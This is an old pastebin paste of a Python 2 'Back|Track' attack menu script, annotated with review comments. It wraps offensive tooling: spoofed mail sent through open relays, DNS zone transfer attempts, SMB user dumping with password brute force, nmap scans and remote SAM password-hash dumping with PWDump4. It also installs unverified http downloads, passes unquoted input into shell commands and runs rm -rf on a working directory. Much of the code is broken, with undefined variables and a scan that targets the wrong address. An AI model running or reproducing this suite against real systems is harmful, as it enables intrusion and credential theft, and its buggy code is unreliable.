
Paste Description for ReL1K's Suite

entire exploit suite for backtrack

ReL1K's Suite
Monday, April 23rd, 2007 at 3:28:01pm UTC 

  1. #! /usr/bin/python
  2. # Back|Track V2.0 Attack Module
  3. # Created by: ReL1K
  4. #
  5. # Remember to chmod 755 btupdate.py
  6. #
  7.  
  8.  
  9. import os
  10. import smtplib
  11. import time
  12. import dns.zone
  13. import dns.query
  14. import dns.resolver
  15. import sys
  16. from dns.rdatatype import *
  17. from dns.rdataclass import *
  18. from dns.exception import DNSException
  19.  
  20. print """
  21.  
  22. Back|Track v2.0 Final Toolset
  23. Written by: ReL1K
  24.    
  25.  
  26. """
  27.  
  28.  
  29. # Main menu: top-level dispatcher for the whole script.
      # The loop shows this prompt again after every sub-menu returns and only
      # ends when '6' is entered. raw_input() returns a string, so each choice
      # is compared against a string literal. In the visible part of the paste
      # only '1', '2', '3' and '6' have handlers; '4', '5' and any other input
      # fall through and the menu is simply displayed again.
  30.  
  31. while 1==1 :
  32.     mainmenu=raw_input("""Back|Track Main Menu:
  33.    
  34.     1. Back|Track Updates
  35.     2. External Attack and Penetration
  36.     3. Internal Attack and Penetration
  37.     4. Wireless Assessment
  38.     5. Fuzzers
  39.     6. Exit
  40.  
  41.     Enter the number: """)
  42. # End Main Menu
  43.  
  44. # Option 6 (Exit) ends the loop
  45.  
  46.     if mainmenu == ('6'):
  47.       print """
  48.  
  49.          ****    QUITTING   ****
  50.      
  51.       """
  52.       break
  53.  
  54. # End loop
  55.  
  56. # Start BackTrack Updates
      # Sub-menu that updates or installs tools by handing a fixed command
      # string to os.system() and printing the status value it returns.
      # NOTE(review): options 3-6 fetch source over plain http:// (svn co,
      # wget) and then build and install it (make install, cp into
      # /usr/local/bin) with no checksum or signature check, so whoever can
      # alter the download or the upstream host decides what gets installed.
      # Compare each download against a published hash or signature before
      # building. The paths under /pentest and /usr/local suggest the script
      # runs as root -- confirm.
      # NOTE(review): the steps are joined with ';', so later steps still run
      # when an earlier one (checkout, download, cd) has failed.
  57.      
  58.     if mainmenu == ('1'):
  59.         while 1==1 :
  60.            blah=raw_input("""Enter a number to update
  61.  
  62.     1. Metasploit 2
  63.     2. Metasploit 3
  64.     3. Aircrack-NG
  65.     4. Kismet
  66.     5. Milw0rm
  67.     6. Install Aircrack-PTW
  68.     7. Return to Main Menu
  69.  
  70.     Enter number: """)
  71.  
             # Options 1 and 2 update existing working copies in place; the
             # repository URL they pull from is not visible in this script.
  72.            if blah == '1':
  73.               print """
  74.  
  75.               **** Updating Metasploit v2 ****
  76.  
  77.               """
  78.               a=os.system("svn update /pentest/exploits/framework2/")
  79.               print a     
  80.            if blah == '2':
  81.              print """
  82.  
  83.               **** Updating Metasploit v3 ****
  84.  
  85.               """
  86.              b=os.system("svn update /pentest/exploits/framework3/")
  87.              print b
  88.            if blah == '3':
  89.              print """
  90.  
  91.               **** Updating AirCrack-NG ****
  92.  
  93.               """
             # Checks out trunk over http and runs "make install" on whatever
             # revision was fetched; nothing pins or verifies the source.
  94.              c=os.system("svn co http://trac.aircrack-ng.org/svn/trunk/ /pentest/wireless/aircrack-ng;cd /pentest/wireless/aircrack-ng;make clean && make && make install")
  95.              print c
  96.            if blah == '4':
  97.              print """
  98.  
  99.              **** Updating Kismet ****
  100.  
  101.               """
             # Same pattern as option 3: unverified http checkout, then
             # ./configure, make and make install.
  102.              d=os.system("svn co http://svn.kismetwireless.net/code/trunk /pentest/wireless/kismet;cd /pentest/wireless/kismet;./configure && make clean && make && make install")
  103.              print d
  104.            if blah == '5':
  105.              print """
  106.  
  107.              **** Updating Milw0rm ****
  108.  
  109.              """
  110.  
             # Downloads an archive over http, unpacks it and runs a script
             # (./makeindex-milw0rm) from inside the unpacked tree.
             # NOTE(review): the command string ends in '&&' with nothing after
             # it, which the shell will most likely reject as a syntax error.
  111.              e=os.system("cd /pentest/exploits;wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2;tar jxpf milw0rm.tar.bz2;rm milw0rm.tar.bz2;cd milw0rm;./makeindex-milw0rm &&")
  112.              print e
  113.            if blah == '6':
  114.              print """
  115.  
  116.              **** Adding AirCrack-PTW to Back|Track ****
  117.  
  118.              """
  119.  
             # Downloads a tarball over http, compiles it with gcc and copies
             # the binary into /usr/local/bin; the tarball is never verified.
  120.              f=os.system("cd /pentest/wireless;wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz;tar -zxvf aircrack-ptw-1.0.0.tar.gz;cd aircrack-ptw-1.0.0;gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 -lpcap aircrack-ptw.c aircrack-ptw-lib.c -lpcap ;cp aircrack-ptw /usr/local/bin;rm /pentest/wireless/aircrack-ptw-1.0.0.tar.gz;chmod 755 /usr/local/bin/aircrack-ptw")
  121.              print f
  122.            if blah == '7':
  123.              print """
  124.  
  125.              **** Exiting Menu ****
  126.  
  127.              """
  128.              break
  129.  
  130. # End Back|Track Updates                   
  131.  
  132. # Start External Attack and Penetration
       # Sub-menu for checks against externally reachable services. Only
       # options 3, 4 and 7 have handlers in the visible code; 1, 2, 5 and 6
       # fall through and the menu is displayed again.
  133.  
  134.     if mainmenu == '2':
  135.        while 1==1:
  136.           menu = raw_input("""Lets do this:
  137.  
  138.    
  139.        1. Enumeration
  140.        2. Port Scanning
  141.        3. Mail Relay
  142.        4. Zone Transfer
  143.        5. Exploitation
  144.        6. SQL Injection spawn XP_Cmdshell
  145.        7. Return to Previous Menu
  146.        
  147.        Enter a number: """)
  148.    
  149.           if menu == '3' :
  150.  
  151.           # Mail Relay Written by ReL1K
              # Builds a message from operator input and submits it through the
              # named SMTP server with no login() or starttls() call, i.e. as an
              # unauthenticated client over an unencrypted session. A server
              # that accepts such mail for a recipient it does not host is
              # acting as an open relay; relaying should be limited to
              # authenticated or explicitly trusted clients.
  152.  
  153.              ab1 = raw_input ("Enter From: ")
  154.              ab2 = raw_input ("Enter To: ")
  155.              ab5 = time.ctime(time.time())
  156.              ab3 = raw_input ("Enter Subject: ")
  157.              ab4 = raw_input ("Enter Message: ")
              # NOTE(review): there is no empty line between the Subject header
              # and the message text, so the body is not separated from the
              # header block.
  158.              ab6 = ('From: %s\nTo: %s\nDate: %s\nSubject: %s\n%s\n' % (ab1,ab2,ab5,ab3,ab4))
  159.              
  160.              server= raw_input("Enter servername: ")
  161.              print "Sending the mail now..."
  162.              mailsend= smtplib.SMTP('%s' % (server))
  163.              code = mailsend.sendmail(ab1, ab2, ab6)
              # NOTE(review): 's' is not defined anywhere in the visible code
              # (the connection is bound to 'mailsend'), so the next line
              # raises NameError; the session is never closed with quit() and
              # the result check below is not reached.
  164.              s.quit()
              # sendmail() returns a dict of refused recipients; an empty dict
              # means every recipient was accepted.
  165.              if code:
  166.                  print "Didn't send successfully"
  167.              else:
  168.                  print "It worked!"
  169.          
  170.            # End Mail Relay
  171. # Starting Zone Transfer
  172. # By ReL1K
       # Looks up the NS records for a domain and is then meant to request a
       # full zone transfer (AXFR) from each name server and print the records.
       # A transfer only succeeds where the server does not limit AXFR to its
       # authorised secondaries (address ACL or TSIG); an unrestricted transfer
       # hands the complete zone to any client, and AXFR requests from
       # unexpected sources are worth alerting on in DNS server logs.
  173.  
  174.           if menu == '4':
  175.            
  176.              domain = raw_input ("Enter domain name: ")
  177.              print ("Looking up NS for domain %s" % (domain))
              # NOTE(review): this lookup sits outside the try block below, so
              # a failed NS query is not caught and ends the script.
  178.              resolve = dns.resolver.query(domain, 'NS')
  179.              ns= []
  180.              for rdata in resolve:
  181.                  n = str(rdata)
  182.                  print "Name server found:", n
                  # NOTE(review): bare attribute reference, not a call. 'ns'
                  # stays empty, so the loop below never runs.
  183.                  ns.append
  184.  
  185.              for n in ns:
  186.                 print "Attempting a zone transfer..."
  187.                 try:
  188.                  
  189.                     zonetransfer = dns.zone.from_xfr(dns.query.xfr(n, domain))
  190.                     print "\nPrinting results..."
                     # NOTE(review): 'zone' and 'logfile' are not defined in the
                     # visible code (the result is bound to 'zonetransfer'), and
                     # the print statement writes the literal text
                     # 'name, record' rather than the two values.
  191.                     for name, node in zone.nodes.items():
  192.                         rdataset = node.rdatasets
  193.                         for record in rdataset:
  194.                             print >> logfile, 'name, record'
  195.                            
  196.  
                 # NOTE(review): '___class___' has three underscores on each
                 # side, so this handler would itself raise AttributeError.
  197.                 except DNSException, e:
  198.                     print e.___class___, e
  199.  
  200.          
  201. #End Zone Transfer
  202.  
  203. # Option 7: leave the external sub-menu and fall back to the main menu loop
  204.  
  205.           if menu == '7' :
  206.              print """
  207.  
  208.                ***** Returning to Previous Menu *****
  209.      
  210.  
  211.              """
              # Breaks out of the inner "while 1==1" only; the outer loop then
              # prompts with the main menu again.
  212.              break
  213.  
  214. # End option 7 exit
  215.  
  216. # Start Internal Attack and Penetration Option 3
       # Sub-menu for checks run from inside a network. Options 1, 3, 4, 5 and
       # 6 have handlers in the visible code; option 2 does not.
  217.  
  218.     if mainmenu == '3' :
  219.        while 1==1:
  220.           intmenu=raw_input("""What doya wanta do:
  221.  
  222.          
  223.    1. Null Session User Dump and Brute Force (lowercase, upper, and blank)
  224.    2. Blank SQL Ping and Auto Spawn XP_Cmdshell
  225.    3. Port Scanning
  226.    4. Dump SAM
  227.    5. Prep your box for this menu
  228.    6. Go Back a previous menu
  229.  
  230.    Enter a number: """)
  231.  
  232. # Start Option 1 SMB Brute Force
       # Runs smbdumpusers against the given address, then feeds the resulting
       # user list and /root/internalap/smbpasslist.txt to smbbf. Both rely on
       # /root/internalap existing, which option 5 of this menu creates.
       # Per the menu label this is null-session enumeration followed by
       # guessing blank and username-derived passwords; restricting anonymous
       # account enumeration, account lockout and a password policy that
       # rejects such passwords are the corresponding controls.
       # NOTE(review): input1 is placed unquoted into the shell command line
       # and into the output file names, so the shell interprets any
       # metacharacters typed at the prompt. Validate it as an IP address
       # before use.
  233.  
  234.           if intmenu == '1':
  235.              input1=raw_input("Enter the IP address: ")
  236.              smb=os.system("/pentest/enumeration/smb-enum/smbdumpusers -i %s -v -r /root/internalap/%sdumpusers.txt" % (input1,input1))
  237.              print smb
  238.              smbbf=os.system("/pentest/enumeration/smb-enum/smbbf -i %s -p /root/internalap/smbpasslist.txt -u /root/internalap/%sdumpusers.txt -r /root/internalap/%ssmbsuccess.txt -v" % (input1,input1,input1))
  239.              print smbbf
              # NOTE(review): the message below names smbsuccess.txt, but the
              # command above writes to <ip>smbsuccess.txt.
  240.              print """
  241.  
  242.    When completed, your results will be in /root/internalap/smbsuccess.txt
  243.  
  244.             """
  245.  
  246. # Option 1 SMB Brute Force END
  247.  
  248. # Option 3 Port Scanning
       # Asks for a scan type and a target, then runs nmap through os.system()
       # with OS detection (-O), verbose output (-v) and host discovery skipped
       # (-P0), redirecting output to /root/internalap/<ip>portscan.txt.
       # NOTE(review): the target is interpolated unquoted into the shell
       # command and the redirect path; validate it as an IP address first.
  249.  
  250.           if intmenu == '3':
  251.              portmenu=raw_input("""What type of scan:
  252.  
  253.  
  254.     1. Stealth SYN
  255.     2. Stealth TCP
  256.  
  257.     Choose a number:  """)
  258.  
  259.             # Chose 1 Syn Scan
  260.              if portmenu == '1':
  261.                 synip=raw_input("Enter the IP: ")
  262.                 syn=os.system("nmap -sS -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip))
  263.                 print syn
                 # NOTE(review): the message says /pentest/internalap, but the
                 # command above writes under /root/internalap.
  264.                 print "*** Results will be printed in /pentest/internalap under <ip>portscan.txt ***"
  265.             # Chose 2 TCP Scan
             # -sT is nmap's connect() scan: it completes the TCP handshake, so
             # the target's services see and may log each connection, despite
             # the "Stealth" label in the menu.
  266.              if portmenu == '2':
  267.                 tcpip=raw_input("Enter the IP: ")
                 # NOTE(review): the command uses 'synip', not the 'tcpip' just
                 # entered. If option 1 has not run in this session this raises
                 # NameError; otherwise the scan goes to the previously entered
                 # address, which may be a host outside the intended scope.
  268.                 tcp=os.system("nmap -sT -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip))
  269.                 print tcp
  270.                 print "*** Results will be printed in /root/internalap under <ip>portscan.txt ***"
  271.            
  272. # End Port Scan
  273.  
  274. # Start SAM DUMP
       # Prompts for a server address and an account, then runs PWDump4.exe
       # through os.system() with output directed to
       # /root/internalap/<ip>samdump.txt. Per the menu label the output is a
       # SAM dump, so that file should be handled as credential material.
       # NOTE(review): both typed values are interpolated unquoted into the
       # shell command line, so the shell interprets any metacharacters in them.
  275.  
  276.           if intmenu == '4':
  277.              ipdump=raw_input("Enter the IP of server: ")
  278.              ipuser=raw_input("Enter the Username (example domain\user): ")
  279.              sam=os.system("/pentest/windows-binaries/passwd-attack/wine PWDump4.exe %s /u: %s /o: /root/internalap/%ssamdump.txt" % (ipdump,ipuser,ipdump))
  280.              print sam
  281.  
  282.  
  283. # End SAM DUMP
  284.  
  285. # Option 5 Start PREP
       # Recreates the working directory used by the other options in this
       # menu and writes the password-pattern file that option 1 passes to smbbf.
  286.  
  287.           if intmenu == '5':
  288.              print """
  289.  
  290.      ****** Prepping your Box ******
  291.  
  292.                    """
              # NOTE(review): removes /root/internalap and everything in it
              # without asking, so results from earlier runs are lost.
  293.              c=os.system("rm -rf /root/internalap")
  294.              a=os.system("mkdir /root/internalap")
              # Python turns each \n into a real newline before the shell sees
              # the string, so the file gets an empty first line followed by the
              # two %username% patterns. Presumably these are the blank,
              # lowercase and uppercase cases named in the menu -- confirm
              # against smbbf's pattern syntax.
  295.              b=os.system('echo -e "\nlc %username%\nuc %username%" > /root/internalap/smbpasslist.txt')
              # Status values are printed in the order rm, mkdir, echo.
  296.              print c
  297.              print a
  298.              print b
  299.              print """
  300.  
  301.      ****** Your results will be piped to /root/internalap ******
  302.  
  303.              """
  304.  
  305. # Option 5 Prep END
  306.  
  307. # Option 6 Previous Menu
       # Leaves the internal sub-menu; the outer loop then shows the main
       # menu again.
  308.  
  309.           if intmenu == '6':
  310.              print """
  311.  
  312.      ****** Returning to previous menu ******
  313.  
  314.              """
  315.              break
  316.  
  317. # End Option 6 Previous Menu
  318.  
  319. # Starting Main Menu 5 Fuzzers (the main menu lists Fuzzers as option 5; the paste ends here, with no handler shown for options 4 or 5)
